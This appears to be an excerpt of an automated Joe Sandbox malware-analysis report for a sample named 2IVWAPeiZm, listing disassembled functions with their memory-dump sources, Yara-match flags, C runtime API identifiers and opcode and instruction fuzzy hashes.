                          Function 000001CFB961DDD0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                          • String ID:
                          • API String ID: 594724896-0
                          • Opcode ID: cbcb0af5c4ec0b9e0fc61f5741c797428a59e1d73c215e25a4a34673d0dbcbe6
                          • Instruction ID: f644ec9dc345c014712f8a133288fc36564576af0daa7c59d39d8e8c4097b887
                          • Opcode Fuzzy Hash: cbcb0af5c4ec0b9e0fc61f5741c797428a59e1d73c215e25a4a34673d0dbcbe6
                          • Instruction Fuzzy Hash: 4C11BF3914469282F6108B29E490BEC7773F790B84F52922DDA6A833B5CF35CE03C704
                          Function 000001CFB9616788 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalDeleteSection$Freefree
                          • String ID:
                          • API String ID: 1250194111-0
                          • Opcode ID: 2c2e5a34796529a4a5be6099f47fd1e2f13f6f8b89c396f5782b1f565a4b4ed1
                          • Instruction ID: a2e17a3e9e252adc0310e89c259102819042668b343f5c97bda5abb1dc0be3d0
                          • Opcode Fuzzy Hash: 2c2e5a34796529a4a5be6099f47fd1e2f13f6f8b89c396f5782b1f565a4b4ed1
                          • Instruction Fuzzy Hash: AD11C131A80AD1CAFB149F26E440BD873B3FB55BA4F58512DE65A026A5CB38CE478700
                          Function 00007FF6F6083FF4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 4e3e524fe816d8fdedbbcd9c0117ef821ef529bf089941ea9a5db34e2c72991b
                          • Instruction ID: 0fdf380206e3c4ae9c9b35600009f8dc9c903c5c6feb5a4172631a09b42eb3e5
                          • Opcode Fuzzy Hash: 4e3e524fe816d8fdedbbcd9c0117ef821ef529bf089941ea9a5db34e2c72991b
                          • Instruction Fuzzy Hash: F4114C22B18B018AEB00DB70E9542A833A8FB19758F540A31DA2D827A4EF39E1548780
                          Function 000001CFB9612250 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$CurrentErrorExitLast_freefls
                          • String ID:
                          • API String ID: 217443660-0
                          • Opcode ID: 0c54948b413dcb62bcc1e19796f41cb7d637fc0fc87dfeb4486389253ca151fe
                          • Instruction ID: 02b1bd3b4af03ff4c454697dc2e9ab6d14e62d4247949795c97eb79c9f5692e5
                          • Opcode Fuzzy Hash: 0c54948b413dcb62bcc1e19796f41cb7d637fc0fc87dfeb4486389253ca151fe
                          • Instruction Fuzzy Hash: DE011438281BE386FF04ABB1D449BDC22B7EB29B84F145838894D47396EF25CE128310
                          Function 000001CFB960F210 Relevance: 6.0, APIs: 4, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Destroyfree$CreateFree
                          • String ID:
                          • API String ID: 3907340440-0
                          • Opcode ID: 6c35344232297ddca062a7ecf9d343549618f0adc94a152abf304eb900da9dbf
                          • Instruction ID: 017bcdcd6461d0af9552a17a04330a7f679d1e5cce37b7087183ce35c8f9405a
                          • Opcode Fuzzy Hash: 6c35344232297ddca062a7ecf9d343549618f0adc94a152abf304eb900da9dbf
                          • Instruction Fuzzy Hash: 6C01FB762517C196FB49DFA2D2D0BA83372FB44B80F149429DF5A03A50CF34D9B18700
                          Function 000001CFB9617C90 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd$_lock
                          • String ID:
                          • API String ID: 3670291111-0
                          • Opcode ID: 0719577052dd8dbbe3d2956cec04f6aa2f25f45637293d100d6e43a18118f971
                          • Instruction ID: dc7e2e2e3d8d0baff2d6a7eee2eff0cf27ae6b3db2f6f0da059037679ebc90eb
                          • Opcode Fuzzy Hash: 0719577052dd8dbbe3d2956cec04f6aa2f25f45637293d100d6e43a18118f971
                          • Instruction Fuzzy Hash: ACF03A31A811D289FA58BB62C852FE82673EB54B44F08627DDA09073E2DF14CF47D311
                          Function 000001CFB93A417C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
                          • Instruction ID: 0ff36384ee235d28da2c39d84739853e0209b86385bbf37f545b262b2e343d82
                          • Opcode Fuzzy Hash: 101f134f4e12a7d59dd54e5d86992c5274962396a685041d1e783f31e629751d
                          • Instruction Fuzzy Hash: 9F614F30248A848BFBA49F58C089BAD73FAFF94311F6C417DE459C6291C734DE928782
                          Function 000001CFB962450C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit_getptd
                          • String ID: csm$csm
                          • API String ID: 4217099735-3733052814
                          • Opcode ID: b4335f6522e7e80a9ea6f02fb5edf038cefa00e5c77d013af3b4ceb8a0a46fd5
                          • Instruction ID: e03839bb654842f6393b23fce2fb77f0f035dc0fa6a9b2e867dbfd3b3ea96ca7
                          • Opcode Fuzzy Hash: b4335f6522e7e80a9ea6f02fb5edf038cefa00e5c77d013af3b4ceb8a0a46fd5
                          • Instruction Fuzzy Hash: D5519F722442C28AFB64AF25D144BED76B3F345B98F148139DA9857BC5CB38CE92CB01
                          Function 000001CFB960CB84 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandlemallocwsprintf
                          • String ID: %s_bin
                          • API String ID: 2399101171-2665034546
                          • Opcode ID: 73f2347fc04c363fb463311cadf306259aa04cbced74c9f40dacb5d9e580c84a
                          • Instruction ID: 735a5a74e96ddf85284ca8dcd32d2045b031f55c30349411f181ea12d1a7cf60
                          • Opcode Fuzzy Hash: 73f2347fc04c363fb463311cadf306259aa04cbced74c9f40dacb5d9e580c84a
                          • Instruction Fuzzy Hash: 55516936680AE681FB549B66E494BE92377E785B98F45813BDE4943381EF38CE46C301
                          Function 000001CFB93A7323 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
                          • Instruction ID: bf94e87399ae75d4d9b1023224316f8937d70d6c22b42ded64df34b4fee55962
                          • Opcode Fuzzy Hash: 2390259f5c7b96c66dbe66369981e250b2529a0f82c8583acd2dcf66a4ceee86
                          • Instruction Fuzzy Hash: A53192715505488FEB94DF08C484FD83BB6FB18355F9A1268E80ADB6A1C375DE82CB85
                          Function 000001CFB95C1B65 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 33eed6f18bd9708a75986aa2f9e9a3c3770ea949f362b88cbd3767c942d40272
                          • Instruction ID: d469909a9cf8c50b45cedd39f5f193f8978e563285f29ea63d3dac73ebf429c6
                          • Opcode Fuzzy Hash: 33eed6f18bd9708a75986aa2f9e9a3c3770ea949f362b88cbd3767c942d40272
                          • Instruction Fuzzy Hash: 8F21D731298B884FE754DF69C480B9A76F2FB98314F50467EA059C72A1DB34DE418B82
                          Function 000001CFB93992C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 73502fd124d6cf00853d581bf882fb075b8bd757f79a276966b90f1791381e53
                          • Instruction ID: bfdc1264ccbb06477ae5c069fde482f2f1225dea3b4729b7d7e26bcb3e77cd38
                          • Opcode Fuzzy Hash: 73502fd124d6cf00853d581bf882fb075b8bd757f79a276966b90f1791381e53
                          • Instruction Fuzzy Hash: BF217131258B8C4FE744EF18C051B99B7E6FF98314F68066EA49AC72D2CB34CA418782
                          Function 000001CFB95C2A7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: 516149fce9f22260bbb91646df7e774d68420353d6d93d3e92b7422021e3e651
                          • Instruction ID: ba0b405e3fb2dbf00936f1fc07bd31494d7097f3547d0e1569dd49292775b1af
                          • Opcode Fuzzy Hash: 516149fce9f22260bbb91646df7e774d68420353d6d93d3e92b7422021e3e651
                          • Instruction Fuzzy Hash: 4B11B631258A4C4FE754EF5CD445BA572F2F798325F10476EA019C32A1CB74C985C782
                          Function 000001CFB9625673 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm$csm
                          • API String ID: 3186804695-3733052814
                          • Opcode ID: adaa6685140d013229b87e0900e6bb870b5ecf36f56bb8fc9029b7052b75248d
                          • Instruction ID: dc18db952156202acc2ad94cd8a4f0f100bd4e08683a89d168b525862dfd0f9e
                          • Opcode Fuzzy Hash: adaa6685140d013229b87e0900e6bb870b5ecf36f56bb8fc9029b7052b75248d
                          • Instruction Fuzzy Hash: BC31F877140644CAEB709F25C4807983BB7F358BADF8A1229EA4D0BB64C771C981C784
                          Function 000001CFB9612094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: f088f751c6130e0347a60f9d5db140f9e09b5be0cd7f400276dad2ae3b248d9f
                          • Instruction ID: bbbca7f4ac2dece226419f0cea7b7f70dde8dd85f25202d865aa29dad37c33c4
                          • Opcode Fuzzy Hash: f088f751c6130e0347a60f9d5db140f9e09b5be0cd7f400276dad2ae3b248d9f
                          • Instruction Fuzzy Hash: 5911547225479186F7209B15D440B9DB7B3F788BD4F585329AF9907B99CB38CA42CB00
                          Function 000001CFB93A7423 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 35b0bd16f7e3123afff5f8d7884c9707d222e55ed248ace39548ee5ea977c29c
                          • Instruction ID: d44ea5c82b4b6bd6efd72be1dbecffe1289b2bdb9907913d969a349e4d6b3e5d
                          • Opcode Fuzzy Hash: 35b0bd16f7e3123afff5f8d7884c9707d222e55ed248ace39548ee5ea977c29c
                          • Instruction Fuzzy Hash: 5F11FE3058068C8AFFA49F68C484BE936AAEF14301F6C01BDD80A862A2D725CE41C741
                          Function 000001CFB9612FAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID: B
                          • API String ID: 2959964966-1255198513
                          • Opcode ID: b07f0b1de1580df73ef35a1dda026804a211ccf65fffdaf64d0ab0cb9432950b
                          • Instruction ID: 1dcab5c8c5b16f789d96e96d801fb5b1b3c84a891e9b971e0d909626bfd68dec
                          • Opcode Fuzzy Hash: b07f0b1de1580df73ef35a1dda026804a211ccf65fffdaf64d0ab0cb9432950b
                          • Instruction Fuzzy Hash: 1E11A172650A908AFB10DF12D44079DB672F798FE4F984328AF5807B95CF38C645CB00
                          Function 000001CFB9625773 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 34a6e5094d230271cc48ef9976103e3764de904eb69e73686b2bc1866bfbe032
                          • Instruction ID: b98e4f2e7ef056de001991571cb21386961907c5e15341cd54933178957b7375
                          • Opcode Fuzzy Hash: 34a6e5094d230271cc48ef9976103e3764de904eb69e73686b2bc1866bfbe032
                          • Instruction Fuzzy Hash: 82014C365C12C2C9FF78BF22C840BE833B7E754B19F585139CA090AA46DB60CE82C301
                          Function 000001CFB95BB301 Relevance: 5.2, APIs: 4, Instructions: 156COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$_callnewhmalloc
                          • String ID:
                          • API String ID: 2761444284-0
                          • Opcode ID: 485d6661091449d068bae3cf5bd4a678363bbd619fbe34a4675e6c934643b4fd
                          • Instruction ID: 3f183925713036d4017950a02a72b77a40c10fc475028de85a3877fe7151107b
                          • Opcode Fuzzy Hash: 485d6661091449d068bae3cf5bd4a678363bbd619fbe34a4675e6c934643b4fd
                          • Instruction Fuzzy Hash: C841A375598B8A4FF764EF6DC581BA676E2FB59300F00453ED98AC3252DBA0DE034781